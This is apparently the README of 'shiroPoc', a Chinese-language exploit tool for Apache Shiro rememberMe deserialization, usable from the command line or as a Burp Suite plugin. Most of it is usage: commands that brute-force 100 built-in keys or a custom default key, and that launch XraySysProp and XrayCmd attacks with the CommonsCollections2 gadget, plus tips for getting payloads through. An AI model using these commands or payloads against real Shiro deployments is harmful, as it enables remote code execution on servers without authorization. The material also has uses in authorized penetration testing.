mvn package 编译
- 新增shiro 检测方式(对,就是那个不需要gadget的检测方式) 2020.7.30
- 新增shiro 100 key
- 支持自定义key
- 支持作为插件导入burp
- 支持burp的被动扫描(需要burp pro版本
repeater界面中右键,生成payload
生成后,会自动替换request内容,并攻击
当然,这个jar包也可以直接在命令行下运行,生成rememberMe,或者检测,一切不变
自定义key检测
java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/samples_web_war/ kPH+bIxk5D2deZiIxcaaaA==
内置100key检测
java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/
java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar kPH+bIxk5D2deZiIxcaaaA== CommonsCollections2 XraySysProp
运行
java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc
检测
java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/
支持shiro 16个key,支持攻击利用。支持的key与gadget以及攻击类型如下
该攻击类型为XraySysProp,使用方法如下
java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XraySysProp
利用截图如下
该攻击类型为XrayCmd 使用方法如下
java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XrayCmd
利用截图如下
- 建议删除不相关的http请求头,不然会因为http请求头过大而提示400错误
- 建议使用CommonsCollections2 gadget,体积小,利用率高